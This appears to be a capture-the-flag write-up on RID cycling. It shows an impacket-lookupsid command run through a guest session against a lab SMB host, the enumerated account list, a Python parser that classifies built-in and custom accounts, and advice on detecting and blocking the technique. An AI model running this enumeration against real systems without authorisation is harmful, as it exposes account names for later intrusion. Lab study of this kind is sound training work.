RID Cycling


The target SMB server accepts a guest session with read access to the IPC$ share. Because the LSARPC named pipe is reachable through IPC$, a RID cycling attack can be used to enumerate accounts: the domain SID is obtained once and then candidate RIDs are appended to it and resolved to names.

┌──(kali㉿kali)-[~/archive/thm/weasel]
└─$ impacket-lookupsid blah@$IP 100000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Brute forcing SIDs at 10.10.232.68
[*] StringBinding ncacn_np:10.10.232.68[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2336295375-1619315875-398172279
500: DEV-DATASCI-JUP\Administrator (SidTypeUser)
501: DEV-DATASCI-JUP\Guest (SidTypeUser)
503: DEV-DATASCI-JUP\DefaultAccount (SidTypeUser)
504: DEV-DATASCI-JUP\WDAGUtilityAccount (SidTypeUser)
513: DEV-DATASCI-JUP\None (SidTypeGroup)
1000: DEV-DATASCI-JUP\dev-datasci-lowpriv (SidTypeUser)
1001: DEV-DATASCI-JUP\sshd (SidTypeUser)

Performing the RID cycling attack with an arbitrary credential (a non-existent username and an empty password, accepted as a guest session) against the target SMB service identified two non-default accounts besides the built-in ones: dev-datasci-lowpriv and sshd.
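To turn a lookupsid listing like the one above into something a report or a detection rule can consume, here is an added Python example; it is not part of the writeup and not impacket's own code. It parses the listing, reconstructs full SIDs from the domain SID plus RID, and separates the RIDs that Windows creates itself (500, 501, 503, 504, 513 and similar, all below 1000) from accounts created locally by an administrator (RID 1000 and up), which are the ones an enumeration like this is really after. The sample text is copied from the session above, and the well-known RID table is an assumption limited to the entries shown plus a few common domain RIDs.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the output lines from the lookupsid session in the writeup.
SAMPLE_OUTPUT = r"""
[*] Brute forcing SIDs at 10.10.232.68
[*] StringBinding ncacn_np:10.10.232.68[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2336295375-1619315875-398172279
500: DEV-DATASCI-JUP\Administrator (SidTypeUser)
501: DEV-DATASCI-JUP\Guest (SidTypeUser)
503: DEV-DATASCI-JUP\DefaultAccount (SidTypeUser)
504: DEV-DATASCI-JUP\WDAGUtilityAccount (SidTypeUser)
513: DEV-DATASCI-JUP\None (SidTypeGroup)
1000: DEV-DATASCI-JUP\dev-datasci-lowpriv (SidTypeUser)
1001: DEV-DATASCI-JUP\sshd (SidTypeUser)
"""

# Assumed table of RIDs that Windows creates itself. Everything at or above 1000
# is allocated to accounts and groups created after installation.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    503: "DefaultAccount", 504: "WDAGUtilityAccount",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
}
FIRST_CUSTOM_RID = 1000

ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")
DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21-\d+-\d+-\d+)")


@dataclass(frozen=True)
class SidEntry:
    rid: int
    domain: str
    name: str
    sid_type: str


def domain_sid(output: str) -> str:
    """Extract the machine/domain SID that every resolved RID hangs off."""
    m = DOMAIN_SID_RE.search(output)
    if not m:
        raise ValueError("no 'Domain SID is:' line in output")
    return m.group(1)


def parse_lookupsid(output: str) -> list[SidEntry]:
    """Parse 'RID: DOMAIN\\name (SidTypeX)' lines; other lines are ignored."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append(SidEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries


def build_sid(domain: str, rid: int) -> str:
    """A full account SID is the domain SID with the RID appended."""
    return f"{domain}-{rid}"


def split_sid(sid: str) -> tuple[str, int]:
    """Inverse of build_sid: separate the domain part from the trailing RID."""
    head, _, rid = sid.rpartition("-")
    return head, int(rid)


def classify(entry: SidEntry) -> str:
    """Label an entry as a built-in account/group or a locally created one."""
    if entry.rid in WELL_KNOWN_RIDS or entry.rid < FIRST_CUSTOM_RID:
        return "built-in"
    return "custom"


def custom_accounts(entries: list[SidEntry]) -> list[SidEntry]:
    """User accounts that were created on the host, i.e. the interesting ones."""
    return [e for e in entries if classify(e) == "custom" and e.sid_type == "SidTypeUser"]


def summarize(output: str) -> dict[str, list[str]]:
    """Group resolved names by classification, with their full SIDs."""
    dom = domain_sid(output)
    summary: dict[str, list[str]] = {"built-in": [], "custom": []}
    for e in parse_lookupsid(output):
        summary[classify(e)].append(f"{e.name} ({build_sid(dom, e.rid)})")
    return summary


if __name__ == "__main__":
    for label, names in summarize(SAMPLE_OUTPUT).items():
        print(f"{label}:")
        for n in names:
            print(f"  {n}")
```

On the defensive side, the same activity is visible as a burst of LsarLookupSids requests over \pipe\lsarpc from a guest or anonymous session, each resolving a sequential RID. Disabling the Guest account and leaving the "Network access: Allow anonymous SID/Name translation" policy off removes the foothold the writeup relies on.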